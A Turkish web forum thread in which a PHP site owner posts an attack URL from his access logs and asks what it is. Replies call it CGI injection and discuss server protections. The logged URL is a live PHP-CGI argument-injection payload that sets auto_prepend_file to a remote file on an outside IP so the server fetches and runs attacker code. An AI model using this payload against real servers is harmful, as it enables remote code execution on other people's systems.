

Siteme Bir Sql İnj. Denemesi Gelmiş, Bu Nasıl Bir Denemedir. Uzmanlar Buyrun
-
arkadaşlar siteme yapılan url lerde saldırı olabilecek sql inj. denemelerini log luyorum.
Bu alt tarafta denenmek istenen shell gibi bir şey sanırım değilmi ?
Hack işleriyle uğraşmadığımdan ayrıntıyı sizden uzmanlarından alalım...
Php sistemler kodladığımdan bilgim yok değil ancak farklı bir method gibi geldi bana sizlerde görün istedim hemde daha fazla bilgiye sahip olalım istedim.
Eyw.
d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://64.109.183.21/bin/acesso.txt%20-n http://www.buluyo.com/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://64.109.183.21/bin/acesso.txt%20-n 70.84.108.84 24.06.2012 16:10:52 Google araması :
-
CGI Injection
safe modun açık olsun mod_security de varsa sunucuda birşey olmaz.
-
bu hosting hostgator olduğu için direk iptalde.
Şu anda kullanıdığım başka bir makina var orda scriptim gereği safe mod açık durumda.
Çünkü alt dizinlerde geçebilmem gerekiyor. Bunu yedirebilmesi için benimle aynı sunucuda olması gerekiyor diye tahmin ediyorum değilmi ?
Aynı zamanda bunu çalıştırabilmesi içinde script üzerinde bunun koruması olmaması gerekiyor dimi ?
2. taneydi sadece.
Erdem tarafından 07/Kas/12 15:04 tarihinde düzenlenmiştir -
-
Biraz açıklarsan daha çok şey anlayabiliriz ? ne amaçla bu siteden ip reg lerine baktın ?
Altta benim siteye denen url nin farklı benzerleri var ama :))
İlginç demenle bunu çözemiyorum